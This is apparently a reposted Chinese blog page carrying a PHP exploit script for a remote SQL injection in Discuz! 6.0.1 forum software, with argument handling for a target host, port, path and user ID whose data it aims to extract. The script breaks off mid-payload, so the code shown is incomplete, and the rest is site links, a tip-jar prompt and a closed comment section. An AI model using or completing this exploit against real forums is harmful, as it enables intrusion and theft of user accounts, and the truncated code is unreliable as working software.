Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit


本文整理自网络,侵删。

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

相关阅读 >>

discuz! 6.0.0到discuz! 7.0.0升级教程

关于开发手机网站的一些总结

phpcms v9 整合discuz! x2.5 和ucenter 1.6.0详细图文教程

用ucenter home后台 五步迅速聚集人气

discuz!使用技巧:如何隐藏论坛分类的名称?

ucenter 1.5.0 安装教程(图文版)

90后站长谈做网站的经验心得

如何恢复mysql数据库的详细介绍

用js实现过滤script的正则

destoon数据库表说明汇总

更多相关阅读请进入《Discuz论坛》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...